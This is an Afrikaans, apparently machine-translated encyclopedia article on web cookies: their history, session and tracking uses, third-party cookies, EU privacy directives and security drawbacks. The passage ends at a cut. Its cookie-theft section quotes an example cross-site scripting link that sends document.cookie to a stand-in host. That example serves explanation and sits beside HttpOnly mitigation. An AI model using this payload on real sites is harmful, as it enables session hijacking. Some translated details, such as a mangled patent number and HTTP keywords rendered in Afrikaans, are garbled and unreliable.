Internetkoekie: wat is dit? Definisie, oorsprong, tipes en privaatheid

Un koekie of webkoekie (of koekie, afgekort as getuie in Quebec) word deur die HTTP-kommunikasieprotokol gedefinieer as 'n reeks inligting wat deur 'n HTTP-bediener na 'n HTTP-kliënt gestuur word, wat laasgenoemde terugstuur elke keer as dieselfde HTTP-bediener onder sekere omstandighede navraag gedoen word.

Die koekie is die ekwivalent van a klein tekslêer wat op die terminale gestoor is van die internetgebruiker. Bestaande vir meer as 20 jaar, laat hulle webwerf-ontwikkelaars toe om gebruikersdata te stoor om hul navigasie te vergemaklik en sekere funksies toe te laat. Koekies was nog altyd min of meer omstrede omdat dit oorblywende persoonlike inligting bevat wat moontlik deur derde partye uitgebuit kan word.

Dit word as 'n HTTP-opskrif deur die webbediener na die webblaaier gestuur wat dit onveranderd terugstuur elke keer as dit toegang tot die bediener verkry. 'n Koekie kan gebruik word om 'n verifikasie, 'n sessie (staatsinstandhouding), en vir stoor spesifieke inligting oor die gebruiker, soos werfvoorkeure of die inhoud van 'n elektroniese inkopiemandjie. Die term koekie is afgelei van towerkoekie, 'n bekende konsep in UNIX-rekenaars, wat die idee en naam van blaaierkoekies geïnspireer het. 'n Paar alternatiewe vir koekies bestaan, elk met hul eie gebruike, voordele en nadele.

Omdat dit eenvoudige tekslêers is, is koekies nie uitvoerbaar nie. Hulle is nie nie spyware of virusse nie, alhoewel koekies van sommige werwe deur baie anti-virus sagteware opgespoor word omdat dit gebruikers toelaat om opgespoor te word wanneer hulle verskeie werwe besoek. 

Die meeste moderne blaaiers laat gebruikers toe besluit of om koekies te aanvaar of te verwerp. Gebruikers kan ook kies hoe lank koekies gestoor word. Die volledige verwerping van webkoekies maak egter sommige werwe onbruikbaar. Stoor byvoorbeeld inkopietrollies of werwe wat aanmelding vereis deur geloofsbriewe (gebruikersnaam en wagwoord) te gebruik.

Geskiedenis

die term koekie is afgelei van die Engelse term towerkoekie, wat 'n pakkie data is wat 'n program ontvang en onveranderd terugstuur. Koekies is reeds in IT gebruik wanneer Lou Montulli het die idee gehad om dit in webkommunikasie te gebruik in Junie 1994. Hy was op daardie stadium in diens van Netscape Communications, wat 'n e-handeltoepassing vir 'n kliënt ontwikkel het. Koekies het 'n oplossing gegee vir die probleem van die betroubaarheid van 'n winkel se virtuele inkopiemandjie-implementering.

John Giannandrea en Lou Montulli het dieselfde jaar Netscape se eerste koekiespesifikasie geskryf. Weergawe 0.9 beta van Mosaic Netscape, vrygestel op 13 Oktober 1994, geïntegreer koekie tegnologie (sien pos). Die eerste (nie-eksperimentele) gebruik van koekies was om te bepaal of besoekers aan die Netscape-webwerf die webwerf voorheen besoek het. Montulli het in 1995 'n patentaansoek vir koekietegnologie ingedien, en Amerikaanse patent 5774670 XNUMX XNUMX is toegestaan. in 1998 toegestaan.

Nadat dit in 0.9 in Netscape 1994 beta geïmplementeer is, is koekies geïntegreer in Internet Explorer 2, wat in Oktober 1995 vrygestel is.

Die bekendstelling van koekies is nog nie algemeen bekend aan die publiek nie. In die besonder, koekies is by verstek aanvaar in blaaier instellings, en gebruikers is nie ingelig oor hul teenwoordigheid. Sommige mense was bewus van die bestaan ​​van koekies rondom die eerste kwartaal van 1995, maar die algemene publiek het eers tot hul bestaan ​​geneem nadat die Financial Times 'n artikel op 12 Februarie 1996 gepubliseer het. In dieselfde jaar het koekies baie media-aandag gekry as gevolg van moontlike privaatheidinbreuke. Die onderwerp van koekies is in twee konsultasies van die Amerikaanse Federale Handelskommissie in 1996 en 1997 bespreek.

Die ontwikkeling van die amptelike koekiespesifikasie was reeds aan die gang. Die eerste besprekings van die amptelike spesifikasie het in April 1995 op die www-talk-poslys plaasgevind. 'n Spesiale IETF-werkgroep is gevorm. Twee alternatiewe voorstelle vir die bekendstelling van staat aan HTTP-transaksies is onderskeidelik deur Brian Behlendorf en David Kristol voorgestel, maar die groep, onder leiding van Kristol self, het besluit om Netscape se spesifikasie as 'n beginpunt te gebruik. In Februarie 1996 het die werkgroep vasgestel dat derdepartykoekies 'n wesenlike bedreiging vir privaatheid is. Die spesifikasie wat deur die groep vervaardig is, is uiteindelik gepubliseer as RFC 2109.

Vanaf die einde van 2014 sien ons 'n banier oor koekies op baie werwe. Daar is ten minste een blaaieruitbreiding wat die banier nie vertoon nie.

Tipes koekies en gebruike

Sessiebestuur

Koekies kan gebruik word om gebruikersdata tydens navigasie in stand te hou, maar ook oor verskeie besoeke. Koekies is ingestel om 'n manier te verskaf om elektroniese inkopietrollies te implementeer, 'n virtuele toestel waarin die gebruiker die items wat hy wil koop kan versamel terwyl hy op die webwerf blaai.

Deesdae stoor toepassings soos inkopiemandjies eerder die lys items in 'n databasis op 'n bediener, wat verkieslik is; as om dit in die koekie self te stoor. Die webbediener stuur 'n koekie wat 'n unieke sessie-ID bevat. Die webblaaier gee dan hierdie sessie-ID op elke daaropvolgende versoek terug en die items in die mandjie word gestoor en geassosieer met dieselfde unieke sessie-ID.

Gereelde gebruik van koekies is nuttig om by 'n werf aan te meld met geloofsbriewe. Kortom, die webbediener stuur eers 'n koekie wat 'n unieke sessie-ID bevat. Gebruikers verskaf dan hul geloofsbriewe (gewoonlik 'n gebruikersnaam en wagwoord). Die webtoepassing staaf dan die sessie en laat die gebruiker toegang tot die diens toe.

persona

Koekies kan gebruik word om inligting oor die gebruiker van 'n webwerf te onthou, om hom in die toekoms toepaslike inhoud te wys. Byvoorbeeld, 'n webbediener kan 'n koekie stuur wat die laaste gebruikersnaam bevat wat gebruik is om by daardie webwerf aan te meld, sodat daardie gebruikersnaam vooraf ingevul kan word by toekomstige besoeke.

Baie webwerwe gebruik webkoekies vir verpersoonliking op grond van gebruikersvoorkeure. Gebruikers kies hul voorkeure in 'n vorm en dien dit by die bediener in. Die bediener kodeer die voorkeure in 'n koekie en stuur dit terug na die blaaier. Vervolgens, elke keer as die gebruiker toegang tot 'n bladsy van hierdie webwerf verkry, gee die blaaier die koekie terug en dus die lys van voorkeure; die bediener kan dan die bladsy aanpas volgens die gebruiker se voorkeure. Byvoorbeeld, die Wikipedia-webwerf laat sy gebruikers toe om die vel van die webwerf te kies wat hulle verkies. Die Google-soekenjin laat sy gebruikers toe (selfs al is hulle nie geregistreer nie) om die aantal resultate te kies wat hulle op elke resultatebladsy wil sien.

Nasporing

Spoorkoekies word gebruik om die blaaigewoontes van internetgebruikers na te spoor. Dit kan ook gedeeltelik gedoen word deur die IP-adres van die rekenaar te gebruik wat 'n versoek vir 'n bladsy maak of deur die 'verwyser' HTTP-opskrif te gebruik wat die kliënt met elke versoek stuur, maar koekies maak voorsiening vir groter akkuraatheid. Dit kan gedoen word soos in die volgende voorbeeld:

1. As die gebruiker 'n bladsy op 'n webwerf oproep, en die versoek bevat nie 'n koekie nie, neem die bediener aan dat dit die eerste bladsy is wat die gebruiker besoek. Die bediener skep dan 'n ewekansige string en stuur dit saam met die versoekte bladsy na die blaaier.
2. Van hierdie oomblik af sal die koekie outomaties deur die blaaier gestuur word elke keer as 'n nuwe bladsy van die webwerf geroep word. Die bediener sal die bladsy soos gewoonlik stuur, maar sal ook die URL van die bladsy wat genoem word, die datum, tyd van die versoek en die koekie in 'n loglêer aanteken.

Deur na die loglêer te kyk, is dit dan moontlik om te sien watter bladsye die gebruiker besoek het en in watter volgorde. Byvoorbeeld, as die lêer 'n paar versoeke bevat wat gemaak is met die id=abc-koekie, kan dit vasstel dat al hierdie versoeke van dieselfde gebruiker af kom. Die URL wat versoek is, die datum en tyd wat met die versoeke geassosieer word, laat toe dat die gebruiker se blaai nagespoor word.

Derdepartykoekies en webbakens, wat hieronder verduidelik word, maak ook opsporing oor verskillende werwe moontlik. Enkelwerfopsporing word gewoonlik vir statistiese doeleindes gebruik. Daarteenoor word nasporing oor verskillende werwe deur derdepartykoekies oor die algemeen deur advertensiemaatskappye gebruik om anonieme gebruikerprofiele te produseer (wat dan gebruik word om te bepaal watter advertensies aan die gebruiker gewys moet word, asook om vir hom e-posse te stuur wat met hierdie advertensies ooreenstem — SPAM ).

Naspoorkoekies is 'n risiko van inbreuk op gebruiker se privaatheid, maar dit kan maklik uitgevee word. Die meeste moderne blaaiers sluit 'n opsie in om volgehoue ​​koekies outomaties uit te vee wanneer die toepassing toegemaak word.

Derdepartykoekies

Prente en ander voorwerpe wat in 'n webblad vervat is, kan op bedieners anders wees as die een wat die bladsy huisves. Om die bladsy te vertoon, laai die blaaier al hierdie voorwerpe af. Die meeste webwerwe bevat inligting uit verskillende bronne. Byvoorbeeld, as jy www.example.com in jou blaaier tik, sal daar dikwels voorwerpe of advertensies op 'n deel van die bladsy wees wat van verskillende bronne af kom, dit wil sê van 'n ander domein as www. .example.com. "Eerste"-partykoekies is koekies wat gestel word deur die domein wat in die blaaier se adresbalk gelys word. Derdepartykoekies word gestel deur een van die bladsyvoorwerpe wat van 'n ander domein af kom.

By verstek aanvaar blaaiers soos Mozilla Firefox, Microsoft Internet Explorer en Opera derdepartykoekies, maar gebruikers kan die instellings in blaaieropsies verander om dit te blokkeer. Daar is geen sekuriteitsrisiko inherent aan derdepartykoekies wat webfunksionaliteit moontlik maak nie, maar dit word ook gebruik om gebruikers op te spoor. van werf tot werf.

Gereedskap soos Ghostery wat beskikbaar is vir alle blaaiers, insluitend Google Chrome, kan uitruilings tussen derde partye blokkeer.

Implementering

Koekies is klein stukkies data wat deur die webbediener na die blaaier gestuur word. Die blaaier stuur hulle onveranderd terug na die bediener, wat toestand (geheue van vorige gebeure) in die andersins staatlose HTTP-transaksie bekendstel. Sonder koekies is elke herwinning van 'n webbladsy of 'n komponent van 'n webblad 'n geïsoleerde gebeurtenis, onafhanklik van ander versoeke wat na dieselfde webwerf gerig word. Benewens dat dit deur die webbediener gestel kan word, kan koekies ook gestel word deur skriftale soos JavaScript, indien dit deur die blaaier ondersteun en gemagtig word.

Die amptelike koekiespesifikasie stel voor dat blaaiers 'n minimum aantal koekies moet kan stoor en weer stuur. Spesifiek, 'n blaaier moet in staat wees om ten minste 300 koekies van vier kilogrepe elk te stoor, en ten minste 20 koekies vir 'n enkele bediener of domein.

Volgens afdeling 3.1 van RFC 2965, koekiename is hoofletter-onsensitief.

'n Koekie kan die datum van sy vervaldatum spesifiseer, in welke geval die koekie op hierdie datum uitgevee sal word. As die koekie nie 'n vervaldatum spesifiseer nie, word die koekie uitgevee sodra die gebruiker sy blaaier verlaat. Daarom is die spesifiseer van 'n vervaldatum 'n manier om die koekie deur verskeie sessies te laat oorleef. Om hierdie rede word gesê dat koekies met 'n vervaldatum is aanhoudende. 'n Voorbeeldtoepassing: 'n kleinhandelwebwerf kan aanhoudende koekies gebruik om die items aan te teken wat gebruikers in hul inkopiemandjie geplaas het (in werklikheid kan die koekie verwys na 'n inskrywing wat in 'n databasis op die webwerf van verkoop gestoor is, en nie in jou rekenaar nie) . Op hierdie manier, as gebruikers hul blaaier verlaat sonder om 'n aankoop te doen en later daarna terugkeer, sal hulle die items in die mandjie weer kan vind. As hierdie koekies nie 'n vervaldatum gee nie, sal hulle verval wanneer die blaaier gesluit is, en die inligting oor die inhoud van die mandjie sou verlore gaan.

Koekies kan in omvang beperk word tot 'n spesifieke domein, subdomein of pad op die bediener wat dit geskep het.

Skep van 'n koekie

Die oordrag van webblaaie word gedoen met behulp van die HyperText Transfer Protocol (HTTP). Deur webkoekies te ignoreer, bel blaaiers 'n bladsy vanaf webbedieners deur gewoonlik 'n kort teks aan hulle te stuur HTTP-versoek. Byvoorbeeld, om toegang tot die bladsy www.example.org/index.html te verkry, koppel blaaiers aan die bediener www.example.org en stuur 'n versoek wat soos volg lyk:

	KRY /index.html HTTP/1.1 Gasheer: www.example.org
navigator	→	serveur

Die bediener reageer deur die versoekte bladsy te stuur, voorafgegaan deur 'n soortgelyke teks, die hele word opgeroep HTTP-reaksie. Hierdie pakkie kan reëls bevat wat die blaaier opdrag gee om koekies te stoor:

	HTTP/1.1 200 OKInhoud-tipe: teks/htmlStel-koekie: naam=waarde (HTML-bladsy)
navigator	←	serveur

Die bediener stuur slegs die Stel-koekie-lyn as die bediener wil hê dat die blaaier 'n koekie moet stoor. Stel-koekie is 'n versoek vir die blaaier om die naam=waarde-string te stoor en dit in alle toekomstige versoeke aan die bediener terug te stuur. As die blaaier koekies ondersteun en koekies is in die blaaieropsies geaktiveer, sal die koekie ingesluit word by alle daaropvolgende versoeke wat na dieselfde bediener gerig word. Byvoorbeeld, die blaaier roep die bladsy www.example.org/news.html deur die volgende versoek na die bediener www.example.org te stuur:

	KRY /news.html HTTP/1.1Gasheer: www.example.orgWebkoekie: naam=waardeAanvaar: */*
navigator	→	serveur

Dit is 'n versoek vir 'n ander bladsy vanaf dieselfde bediener, en verskil van die eerste hierbo omdat dit 'n string bevat wat die bediener voorheen na die blaaier gestuur het. Danksy hierdie middel weet die bediener dat hierdie versoek aan die vorige een gekoppel is. Die bediener reageer deur die geroepe bladsy te stuur, en ook deur ander koekies daarby te voeg.

Die waarde van die koekie kan deur die bediener verander word deur 'n nuwe reël Stel-koekie te stuur: naam=nuwe_waarde in reaksie op die geroepe bladsy. Die blaaier vervang dan die ou waarde met die nuwe een.

Die Set-Cookie-lyn word gewoonlik deur 'n CGI-program of ander skriftaal geskep, nie deur die HTTP-bediener nie. Die HTTP-bediener (byvoorbeeld: Apache) sal slegs die resultaat van die program ('n dokument voorafgegaan deur die kop wat die koekies bevat) na die blaaier oordra.

Koekies kan ook gestel word deur JavaScript of ander soortgelyke tale wat in die blaaier loop, dit wil sê aan die kliëntkant eerder as die bedienerkant. In JavaScript word die document.cookie-objek vir hierdie doel gebruik. Byvoorbeeld, die stelling document.cookie = "temperatuur=20" skep 'n koekie met die naam "temperatuur" en met 'n waarde van 20.

Eienskappe van 'n koekie

Benewens die naam/waarde-paar, kan 'n koekie ook 'n vervaldatum, 'n pad, 'n domeinnaam en die tipe verbinding wat bedoel is bevat, dit wil sê normaal of geïnkripteer. RFC 2965 definieer ook dat koekies 'n verpligte weergawenommer moet hê, maar dit word gewoonlik weggelaat. Hierdie datadele volg die naam=nuwe_waarde-paar en word deur kommapunte geskei. Byvoorbeeld, 'n koekie kan deur die bediener geskep word deur 'n Stel-koekie-reël te stuur: naam=nuwe_waarde; verval=datum; pad=/; domain=.example.org.

Verval van 'n koekie

Koekies verval en word dan nie deur die blaaier na die bediener gestuur in die volgende situasies nie:

• Wanneer die blaaier gesluit is, as die koekie nie aanhoudend is nie.
• Wanneer die koekie se vervaldatum verby is.
• Wanneer die vervaldatum van die koekie verander word (deur die bediener of die skrip) na 'n datum in die verlede.
• Wanneer die blaaier die koekie op versoek van die gebruiker uitvee.

Die derde situasie laat bedieners of skrifte toe om 'n koekie uitdruklik uit te vee. Let daarop dat dit moontlik is met die Google Chrome-webblaaier om die vervaldatum van 'n spesifieke koekie te weet deur toegang tot die inhoudinstellings te verkry. 'n Koekie wat op 'n rekenaar gestoor is, kan heel moontlik vir 'n paar dekades daar bly as geen prosedure gevolg word om dit uit te vee nie.

Stereotipes

Sedert hul bekendstelling op die internet het baie idees oor koekies op die internet en in die media die rondte gedoen. In 1998 het CIAC, 'n rekenaarvoorvalmoniteringspan van die Amerikaanse departement van energie, vasgestel dat koekiesekuriteitskwesbaarhede "in wese nie bestaan ​​nie" en verduidelik dat "inligting oor die oorsprong van jou besoeke en die besonderhede van die webblaaie wat jy besoek het bestaan ​​reeds in die loglêers van die webbedieners”. In 2005 het Jupiter Research die resultate van 'n studie gepubliseer, waarin 'n beduidende persentasie van die respondente die volgende stellings oorweeg het:

• Koekies is soos virus, besmet hulle gebruikers se hardeskywe.
• Koekies genereer pop-up.
• Koekies word gebruik om te stuur spam.
• Koekies word slegs vir advertensies gebruik.

Koekies kan nie inligting van die gebruiker se rekenaar uitvee of lees nie. Webkoekies maak dit egter moontlik om die webblaaie wat deur 'n gebruiker op 'n gegewe werf of stel werwe besoek word, op te spoor. Hierdie inligting kan in 'n gebruikersprofiel ingesamel word wat gebruik of herverkoop kan word aan derde partye, wat ernstige privaatheidskwessies kan veroorsaak. Sommige profiele is anoniem, in die sin dat hulle geen persoonlike inligting bevat nie, maar selfs sulke profiele kan twyfelagtig wees.

Volgens dieselfde studie weet 'n groot persentasie internetgebruikers nie hoe om koekies uit te vee nie. Een van die redes waarom mense nie koekies vertrou nie, is dat sommige werwe die persoonlik identifiseerbare aspek van koekies misbruik en hierdie inligting met ander bronne gedeel het. 'n Groot persentasie van geteikende advertensies en ongevraagde e-pos, wat as strooipos beskou word, kom van inligting wat verkry is uit naspoorkoekies.

Blaaier instellings

Die meeste blaaiers ondersteun koekies en laat die gebruiker toe om dit te deaktiveer. Die mees algemene opsies is:

• Aktiveer of deaktiveer koekies heeltemal, sodat hulle voortdurend aanvaar of geblokkeer word.
• Laat die gebruiker toe om die aktiewe koekies in 'n gegewe bladsy te sien, deur javascript: alert(document.cookie) in die adresbalk van die blaaier in te voer. Sommige blaaiers inkorporeer 'n koekiebestuurder vir die gebruiker wat koekies kan sien en selektief kan uitvee wat tans deur die blaaier gestoor word.

Die meeste blaaiers laat ook volledige uitvee van persoonlike data toe wat koekies insluit. Bykomende modules om koekietoestemmings te beheer bestaan ​​ook.

Privaatheid en derdepartykoekies

In hierdie fiktiewe voorbeeld het 'n advertensiemaatskappy baniere op twee webwerwe geplaas. Deur die baniere op sy bedieners te huisves en derdepartykoekies te gebruik, kan die advertensiemaatskappy die gebruiker se navigasie deur hierdie twee webwerwe naspoor.

Koekies het belangrike implikasies vir die privaatheid en anonimiteit van webgebruikers. Alhoewel koekies slegs teruggestuur word na die bediener wat dit gestel het of na 'n bediener wat aan dieselfde internetdomein behoort, kan 'n webblad egter beelde of ander komponente bevat wat op bedieners wat aan ander domeine behoort gestoor is. Die koekies wat tydens die herstel van hierdie eksterne komponente gestel word, word genoem derdepartykoekies. Dit sluit koekies van ongewenste opspringvensters in.

Advertensiemaatskappye gebruik derdepartykoekies om gebruikers op te spoor oor die verskillende werwe wat hulle besoek. In die besonder kan 'n advertensiemaatskappy 'n gebruiker opspoor oor alle bladsye waar dit advertensiebeelde of 'n naspoorpixel geplaas het. Kennis van die bladsye wat deur die gebruiker besoek word, stel die advertensiemaatskappy in staat om die advertensievoorkeure van die gebruiker te teiken.

Die vermoë om 'n gebruikersprofiel te bou, word deur sommige as 'n privaatheidskending beskou, veral wanneer nasporing oor verskillende domeine gedoen word deur derdepartykoekies te gebruik. Om hierdie rede het sommige lande koekiewetgewing.

Die regering van die Verenigde State het in 2000 streng reëls oor die plasing van koekies geïmplementeer, nadat dit aan die lig gekom het dat die Withuis se dwelmbeleidskantoor koekies gebruik om die rekenaars van gebruikers wat aanlyn dwelmadvertensies bekyk, op te spoor. In 2002 het die privaatheidsaktivis Daniel Brandt ontdek dat die CIA aanhoudende koekies gelaat het op rekenaars wat sy webwerwe besoek het. Sodra die CIA van hierdie oortreding ingelig is, het die koekies verklaar dat hierdie koekies nie opsetlik gestuur is nie en het opgehou om dit te stel. Op 25 Desember 2005 het Brandt ontdek dat die Nasionale Veiligheidsagentskap (NSA) twee aanhoudende koekies op besoekers se rekenaars gelaat het weens 'n sagteware-opdatering. Nadat die NSA in kennis gestel is, het die koekies onmiddellik gedeaktiveer.

In die Verenigde Koninkryk, die Koekie wet “, wat op 25 Mei 2012 in werking getree het, verplig die webwerwe om hul voornemens te verklaar, waardeur die gebruikers kan kies of hulle spore wil agterlaat of nie van hul gang op die internet. Hulle kan dus teen advertensieteikening beskerm word. Maar Volgens The Guardian, is die toestemming van internetgebruikers nie noodwendig eksplisiet nie; veranderinge is aangebring aan die bepalings van gebruikertoestemming, wat dit maak dus geïmpliseer.

Richtlijn 2002/58 oor privaatheid

Richtlijn 202/58 privaatheid en elektroniese kommunikasie, bevat reëls oor die gebruik van koekies. In die besonder, artikel 5, paragraaf 3 van hierdie richtlijn vereis dat die berging van data (soos koekies) in die gebruiker se rekenaar slegs gedoen kan word indien:

• die gebruiker ingelig word oor hoe die data gebruik word;
• die gebruiker kry die opsie om hierdie berging te weier. Hierdie artikel bepaal egter ook dat die berging van data om tegniese redes van hierdie wet vrygestel is.

Die richtlijn, wat vanaf Oktober 2003 geïmplementeer sou word, is egter slegs baie onvolmaak in die praktyk toegepas volgens 'n verslag van Desember 2004, wat ook daarop gewys het dat sekere lidlande (Slowakye, Letland, Griekeland, België en Luxemburg) nog nie die riglyn in binnelandse reg.

Volgens die mening van die G29 in 2010, bly hierdie richtlijn, wat veral die gebruik van webkoekies vir gedragsreklamedoeleindes op die uitdruklike toestemming van die internetgebruiker voorwaarde, baie swak toegepas. Trouens, die meeste webwerwe doen dit op 'n manier wat nie aan die richtlijn voldoen nie, deur hulself te beperk tot 'n eenvoudige "banier" wat inlig oor die gebruik van "koekies" sonder om inligting oor die gebruike te gee, sonder om te onderskei tussen "tegniese" koekies. "naspoor" koekies, en ook nie om 'n werklike keuse te bied aan die gebruiker wat tegniese koekies wil handhaaf (soos inkopiemandjie bestuur koekies) en weier om "na te spoor" koekies. Trouens, baie werwe funksioneer nie korrek as koekies geweier word nie, wat nie aan richtlijn 2002/58 of richtlijn 95/46 (Beskerming van persoonlike data) voldoen nie.

Richtlijn 2009 / 136 / CE

Hierdie materiaal is bygewerk deur Richtlijn 2009/136/EC gedateer 25 November 2009 wat bepaal dat die "berging van inligting, of die verkryging van toegang tot inligting wat reeds gestoor is, in die eindtoerusting van 'n intekenaar of gebruiker slegs toegelaat word op voorwaarde dat die intekenaar of gebruiker sy toestemming gegee het, nadat hy, in ooreenstemming met Richtlijn 95/46/EG, duidelike en volledige inligting tussen ander oor die doeleindes van die verwerking ontvang het. Die nuwe richtlijn versterk dus die verpligtinge voordat koekies op die internetgebruiker se rekenaar geplaas word.

In die voorlopige oorwegings van die richtlijn, spesifiseer die Europese wetgewer egter: "Waar tegnies moontlik en effektief, in ooreenstemming met die relevante bepalings van Richtlijn 95/46/EG, kan die toestemming van die gebruiker met betrekking tot die verwerking uitgespreek word deur die gebruik van die toepaslike instellings van 'n blaaier of ander toepassing". Maar in werklikheid maak geen blaaier tot dusver dit moontlik om die noodsaaklike tegniese koekies te dissosieer van die opsionele koekies wat aan die gebruiker se keuse oorgelaat moet word nie.

Hierdie nuwe richtlijn is in Julie 2012 deur Belgiese LP's omgesit. 'n 2014-studie toon dat selfs LP's sukkel om aansoek te doen die beperkings van die richtlijn.

P3P

Die P3P-spesifikasie sluit die vermoë in vir 'n bediener om 'n privaatheidsbeleid te stel, wat definieer watter soort inligting dit versamel en vir watter doel. Hierdie beleide sluit in (maar is nie beperk nie tot) die gebruik van inligting wat met behulp van koekies ingesamel is. Volgens die definisies van P3P, kan 'n blaaier koekies aanvaar of verwerp deur die privaatheidsbeleide met die gebruiker se voorkeure te vergelyk of deur die gebruiker te vra, die privaatheidsbeleid-privaatheidsverklaring aan te bied wat deur die bediener verklaar is.

Baie blaaiers, insluitend Apple Safari en Microsoft Internet Explorer weergawes 6 en 7, ondersteun P3P wat die blaaier toelaat om te bepaal of derdeparty-koekieberging moet aanvaar. Die Opera-blaaier laat gebruikers toe om derdepartykoekies te weier en om 'n globale en spesifieke sekuriteitsprofiel vir internetdomeine te skep. Mozilla Firefox weergawe 2 het P3P-ondersteuning laat vaar, maar dit in weergawe 3 herstel.

Derdepartykoekies kan deur die meeste blaaiers geblokkeer word om privaatheid te verhoog en advertensienasporing te verminder, sonder om die gebruiker se webervaring negatief te beïnvloed. Baie reklame-agentskappe bied 'n opsie kies uit na geteikende advertensies, deur 'n generiese koekie in die blaaier op te stel wat hierdie teikening deaktiveer, maar so 'n oplossing is nie prakties effektief, wanneer dit gerespekteer word nie, want hierdie generiese koekie word uitgevee sodra die gebruiker hierdie koekies uitvee wat die opt kanselleer uit besluit.

Nadele van koekies

Benewens privaatheidskwessies, het koekies ook 'n paar tegniese nadele. Veral, hulle identifiseer gebruikers nie altyd akkuraat nie, hulle kan werfprestasie vertraag wanneer dit in groot getalle is, hulle kan vir sekuriteitsaanvalle gebruik word, en dit bots met die verteenwoordigende staatsoordrag, argitektoniese styl van die sagteware.

Onakkurate identifikasie

As meer as een blaaier op 'n rekenaar gebruik word, is daar altyd 'n aparte stooreenheid vir koekies in elkeen van hulle. Koekies identifiseer dus nie 'n persoon nie, maar die kombinasie van 'n gebruikersrekening, 'n rekenaar en 'n webblaaier. Enigiemand kan dus hierdie rekeninge, rekenaars of blaaiers gebruik wat die verskeidenheid koekies het. Net so maak koekies nie onderskeid tussen veelvuldige gebruikers wat dieselfde gebruikersrekening, rekenaar en blaaier deel nie, soos in "internetkafees" of enige plek wat gratis toegang tot rekenaarhulpbronne gee.

Maar in die praktyk blyk hierdie stelling in die meeste gevalle foutief te wees, want vandag word 'n "persoonlike" rekenaar (of 'n slimfoon, of tablet, wat erger is) hoofsaaklik deur 'n enkele individu gebruik. Dit kom daarop neer om 'n spesifieke persoon te teiken en deur die hoeveelheid inligting wat ingesamel word, by persoonlike teikening uitkom, selfs al is die persoon nie "naamlik" geïdentifiseer nie.

Diefstal van koekies

'n Koekie kan deur 'n ander rekenaar op die netwerk gesteel word.

Tydens normale werking word koekies teruggestuur tussen die bediener (of 'n groep bedieners in dieselfde domein) en die gebruiker se rekenaarblaaier. Aangesien koekies sensitiewe inligting kan bevat (gebruikersnaam, 'n wagwoord wat vir stawing gebruik word, ens.), behoort hul waardes nie toeganklik te wees vir ander rekenaars nie. Koekiediefstal is 'n daad van onderskepping van koekies deur 'n ongemagtigde derde party.

Koekies kan gesteel word deur 'n pakkiesnuffel in 'n aanval wat sessiekaping genoem word. Verkeer op die net kan onderskep en gelees word deur ander rekenaars as dié wat stuur en ontvang (veral op die ongeënkripteerde openbare Wi-Fi-spasie). Hierdie verkeer sluit webkoekies in wat oor sessies gestuur word deur die gewone HTTP-protokol te gebruik. Wanneer netwerkverkeer nie geënkripteer is nie, kan kwaadwillige gebruikers dus die kommunikasie van ander gebruikers op die netwerk lees met behulp van "pakkie sniffers".

Hierdie probleem kan oorkom word deur die verbinding tussen die gebruiker se rekenaar en die bediener te enkripteer met behulp van die HTTPS-protokol. 'n Bediener kan 'n spesifiseer veilige vlag terwyl jy 'n koekie sit; die blaaier sal dit slegs oor 'n veilige lyn stuur, soos 'n SSL-verbinding.

Alhoewel baie webwerwe, alhoewel HTTPS-geënkripteerde kommunikasie vir gebruikersverifikasie (d.w.s. die aanmeldbladsy) gebruik word, stuur later sessiekoekies en ander data soos normaalweg deur ongeënkripteerde HTTP-verbindings om doeltreffendheidsredes. Aanvallers kan dus ander gebruikers se koekies onderskep en hulle op toepaslike werwe naboots of dit in koekie-aanvalle gebruik.

Skripte in die webwerf: 'n koekie wat slegs tussen die bediener en die kliënt uitgeruil moet word, word na 'n ander derde party gestuur.

Nog 'n manier om koekies te steel, is om webwerwe te skryf en die blaaier self koekies na kwaadwillige bedieners te stuur wat dit nooit ontvang nie. Moderne blaaiers laat die uitvoering van gesogte dele van kode vanaf die bediener toe. As daar tydens looptyd toegang tot koekies verkry word, kan hul waardes in een of ander vorm aan bedieners gekommunikeer word wat nie toegang daartoe behoort nie. Om koekies te enkripteer voordat dit oor die netwerk gestuur word, help nie om die aanval te stuit nie.

Hierdie tipe in-site scripting word tipies gebruik deur aanvallers op werwe wat gebruikers toelaat om HTML-inhoud te plaas. Deur 'n deel van versoenbare kode in die HTML-bydrae te integreer, kan 'n aanvaller koekies van ander gebruikers ontvang. Kennis van hierdie koekies kan gebruik word deur aan dieselfde webwerf te koppel deur die gesteelde koekies te gebruik, om sodoende erken te word as die gebruiker wie se koekies gesteel is.

Een manier om sulke aanvalle te voorkom, is om die HttpOnly-vlag te gebruik; dit is 'n opsie, bekendgestel sedert weergawe 6 van Internet Explorer in PHP sedert weergawe 5.2.0 wat beplan word om die koekie naby die skrif vir die kliënt ontoeganklik te maak. Webontwikkelaars moet dit egter in hul werfontwikkeling in ag neem sodat hulle immuun is teen scripts op die werf.

Nog 'n sekuriteitsbedreiging wat gebruik word, is vraagvervaardiging op die webwerf.

Die amptelike tegniese spesifikasie laat toe dat koekies net teruggestuur word na bedieners in die domein waarvandaan dit ontstaan ​​het. Die waarde van koekies kan egter na ander bedieners gestuur word deur ander middele as koekieopskrifte te gebruik.

In die besonder, skriftale soos JavaScript word oor die algemeen toegelaat om toegang tot koekiewaardes te verkry en is in staat om arbitrêre waardes na enige bediener op die internet te stuur. Hierdie skrifvermoë word vanaf webwerwe gebruik wat gebruikers toelaat om HTML-inhoud te plaas vir ander gebruikers om te sien.

Byvoorbeeld, 'n aanvaller wat op die example.com-domein werk, kan 'n opmerking plaas wat die volgende skakel bevat wat na 'n gewilde blog verwys wat hulle andersins nie beheer nie:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Wanneer 'n ander gebruiker op hierdie skakel klik, voer die blaaier die onclick-kenmerkdeel van die kode uit, dus vervang dit die document.cookie-string met die lys van gebruikerkoekies wat vir hierdie bladsy aktief is. Daarom word hierdie lys van koekies na die example.com-bediener gestuur, en die aanvaller is dus in staat om die koekies van hierdie gebruiker te versamel.

Hierdie tipe aanval is moeilik om aan die gebruikerkant op te spoor, want die skrif kom van dieselfde domein wat die koekie gestel het, en die operasie om die waardes te stuur blyk deur daardie domein gemagtig te wees. Dit word beskou as die verantwoordelikheid van die administrateurs wat hierdie tipe webwerf bedryf om beperkings in te stel wat die publikasie van kwaadwillige kode verhoed.

Koekies is nie direk sigbaar aan kliënt-kant programme soos JavaScript as hulle gestuur is met die HttpOnly vlag. Vanuit die bediener se oogpunt is die enigste verskil dat daar in die reël van die Set-Cookie-kopskrif 'n nuwe veld bygevoeg is wat die string HttpOnly bevat:

